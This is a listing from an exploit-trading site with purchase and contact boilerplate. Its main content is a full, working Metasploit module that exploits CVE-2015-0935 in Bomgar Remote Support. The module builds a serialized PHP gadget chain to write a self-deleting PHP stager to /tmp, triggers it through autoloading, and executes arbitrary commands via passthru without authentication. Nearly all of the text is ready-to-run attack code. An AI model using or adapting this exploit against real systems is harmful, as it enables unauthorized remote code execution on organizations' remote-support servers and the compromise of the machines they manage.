0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Bomgar Remote Support - Unauthenticated Code Execution (Metasploit)
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize super( 'Name' => 'Bomgar Remote Support Unauthenticated Code Execution', 'Description' => %q{ This module exploits a vulnerability in the Bomgar Remote Support, which deserializes user provided data using PHP's `unserialize` method. By providing an specially crafted PHP serialized object, it is possible to write arbitrary data to arbitrary files. This effectively allows the execution of arbitrary PHP code in the context of the Bomgar Remote Support system user. To exploit the vulnerability, a valid Logging Session ID (LSID) is required. It consists of four key-value pairs (i. e., 'h=[...];l=[...];m=[...];t=[...]') and can be retrieved by an unauthenticated user at the end of the process of submitting a new issue via the 'Issue Submission' form. Versions before 15.1.1 are reported to be vulnerable. }, 'Author' => [ 'Markus Wulftange', ], 'License' => MSF_LICENSE, 'DisclosureDate' => 'May 5 2015', 'References' => [ ['CWE', '94'], ['CWE', '502'], ['CVE', '2015-0935'], ['US-CERT-VU', '978652'], ['URL', 'http://codewhitesec.blogspot.com/2015/05/cve-2015-0935-bomgar-remote-support-portal.html'], ], 'Privileged' => false, 'Targets' => [ [ 'Linux x86', { 'Platform' => 'linux', 'Arch' => ARCH_X86, 'CmdStagerFlavor' => [ :echo, :printf ] } ], [ 'Linux x86_64', { 'Platform' => 'linux', 'Arch' => ARCH_X86_64, 'CmdStagerFlavor' => [ :echo, :printf ] } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'TARGETURI' => '/session_complete', }, ) register_options( [ OptString.new('LSID', [true, 'Logging Session ID']), ], self.class ) end def check version = detect_version if version print_status("Version #{version} detected") if version < '15.1.1' return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end end print_status("Version could not be detected") return Exploit::CheckCode::Unknown end def exploit execute_cmdstager handler end def execute_command(cmd, opts) tmpfile = "/tmp/#{rand_text_alphanumeric(10)}.php" vprint_status("Uploading payload to #{tmpfile} ...") upload_php_file(tmpfile, generate_stager_php(cmd)) vprint_status("Triggering payload in #{tmpfile} ...") execute_php_file(tmpfile) end def detect_version res = send_request_raw( 'uri' => '/' ) if res and res.code == 200 and res.body.to_s =~ /<!--Product Version: (\d+\.\d+\.\d+)-->/ return $1 end end def upload_php_file(filepath, data) send_pso(generate_upload_file_pso(filepath, data)) end def execute_php_file(filepath) send_pso(generate_autoload_pso(filepath)) end def send_pso(pso) res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'vars_post' => { 'lsid' => datastore['LSID'], 'survey' => pso, } ) if res if res.code != 200 fail_with(Failure::UnexpectedReply, "Unexpected response from server: status code #{res.code}") end if res.body.to_s =~ />ERROR: ([^<>]+)</ fail_with(Failure::Unknown, "Error occured: #{$1}") end else fail_with(Failure::Unreachable, "Error connecting to the remote server") unless successful end res end def generate_stager_php(cmd) "<?php unlink(__FILE__); passthru('#{cmd.gsub(/[\\']/, '\\\\\&')}');" end def generate_upload_file_pso(filepath, data) log_file = PHPObject.new( "Log_file", { "_filename" => filepath, "_lineFormat" => "", "_eol" => data, "_append" => false, } ) logger = PHPObject.new( "Logger", { "\0Logger\0_logs" => [ log_file ] } ) tracer = PHPObject.new( "Tracer", { "\0Tracer\0_log" => logger } ) serialize(tracer) end def generate_autoload_pso(filepath) object = PHPObject.new( filepath.chomp('.php').gsub('/', '_'), {} ) serialize(object) end class PHPObject attr_reader :name, :members def initialize(name, members) @name = name @members = members end end def serialize(value) case value.class.name.split('::').last when 'Array' then serialize_array_numeric(value) when 'Fixnum' then serialize_integer(value) when 'Float' then serialize_double(value) when 'Hash' then serialize_array_assoc(value) when 'Nil' then serialize_nil when 'PHPObject' then serialize_object(value) when 'String' then serialize_string(value) when 'TrueClass', 'FalseClass' then serialize_boolean(value) else raise "Value of #{value.class} cannot be serialized" end end def serialize_array_numeric(a) "a:#{a.size}:{" + a.each_with_index.map { |v, i| serialize_integer(i) + serialize(v) }.join + "}" end def serialize_array_assoc(h) "a:#{h.size}:{" + h.each_pair.map { |k, v| serialize_string(k) + serialize(v) }.join + "}" end def serialize_boolean(b) "b:#{b ? '1' : '0'};" end def serialize_double(f) "d:#{f};" end def serialize_integer(i) "i:#{i};" end def serialize_null "N;" end def serialize_object(o) "O:#{serialize_string(o.name)[2..-2]}:#{serialize_array_assoc(o.members)[2..-1]}" end def serialize_string(s) "s:#{s.size}:\"#{s}\";" end end # 0day.today [2024-12-25] #